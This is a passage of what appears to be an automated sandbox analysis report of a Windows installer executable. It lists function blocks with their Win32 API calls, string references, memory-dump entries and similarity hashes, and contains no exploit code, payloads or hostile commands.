                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                      • String ID: F$N$open
                                                                                                                                                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                      • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D79,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                      • `G, xrefs: 0040246E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                      • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D79,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
